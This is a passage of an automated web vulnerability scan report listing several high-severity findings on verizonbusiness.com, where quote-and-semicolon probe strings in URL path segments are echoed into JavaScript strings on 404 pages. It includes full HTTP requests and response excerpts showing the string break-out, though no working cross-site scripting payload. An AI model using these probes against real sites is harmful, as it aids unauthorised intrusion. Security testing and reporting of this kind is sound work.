<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/about/news/94da5';3530f120cba'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.423. http://www.verizonbusiness.com/about/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81d51'%3b2f51d0ef285 was submitted in the REST URL parameter 1. This input was echoed as 81d51';2f51d0ef285 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about81d51'%3b2f51d0ef285/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:04 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40838
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/about81d51';2f51d0ef285/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array
...[SNIP]...

1.424. http://www.verizonbusiness.com/about/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 445b6"%3b57d84659d54 was submitted in the REST URL parameter 1. This input was echoed as 445b6";57d84659d54 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about445b6"%3b57d84659d54/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:55 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40836
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about445b6";57d84659d54/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT C
...[SNIP]...

1.425. http://www.verizonbusiness.com/about/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f936a'%3b4102301e0de was submitted in the REST URL parameter 2. This input was echoed as f936a';4102301e0de in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/newsf936a'%3b4102301e0de/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:44 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47299
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:44 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/about/newsf936a';4102301e0de/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
v
...[SNIP]...

1.426. http://www.verizonbusiness.com/about/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e157e"%3b8ca0a1c9999 was submitted in the REST URL parameter 2. This input was echoed as e157e";8ca0a1c9999 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/newse157e"%3b8ca0a1c9999/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:49:17 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 47297
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/newse157e";8ca0a1c9999/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGO
...[SNIP]...

1.427. http://www.verizonbusiness.com/about/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7d47'%3bc44e3a137ac was submitted in the REST URL parameter 3. This input was echoed as f7d47';c44e3a137ac in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/f7d47'%3bc44e3a137ac HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:50:27 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49711
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:27 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:27 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about/news/f7d47';c44e3a137ac'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.428. http://www.verizonbusiness.com/about/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec193"%3bf3a2df38088 was submitted in the REST URL parameter 3. This input was echoed as ec193";f3a2df38088 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/ec193"%3bf3a2df38088 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:50:02 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49711
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:02 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news/ec193";f3a2df38088";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.429. http://www.verizonbusiness.com/about/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 707be'%3bea9ddb36751 was submitted in the REST URL parameter 1. This input was echoed as 707be';ea9ddb36751 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about707be'%3bea9ddb36751/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:48:53 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40818
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:53 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about707be';ea9ddb36751/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i
...[SNIP]...

1.430. http://www.verizonbusiness.com/about/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69ba8"%3bb3035579d66 was submitted in the REST URL parameter 1. This input was echoed as 69ba8";b3035579d66 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about69ba8"%3bb3035579d66/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:30 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40818
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:30 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about69ba8";b3035579d66/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY


...[SNIP]...

1.431. http://www.verizonbusiness.com/about/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2ce3"%3b4996ee8df0d was submitted in the REST URL parameter 2. This input was echoed as e2ce3";4996ee8df0d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/newse2ce3"%3b4996ee8df0d/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:49:35 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 47279
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/newse2ce3";4996ee8df0d/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPT
...[SNIP]...

1.432. http://www.verizonbusiness.com/about/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd0fb'%3b02135e5dcf9 was submitted in the REST URL parameter 2. This input was echoed as cd0fb';02135e5dcf9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/newscd0fb'%3b02135e5dcf9/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:50:01 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47279
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about/newscd0fb';02135e5dcf9/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; i
...[SNIP]...

1.433. http://www.verizonbusiness.com/about/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0252"%3b851574e3ffe was submitted in the REST URL parameter 3. This input was echoed as f0252";851574e3ffe in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/f0252"%3b851574e3ffe HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:50:16 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 49713
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news/f0252";851574e3ffe";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

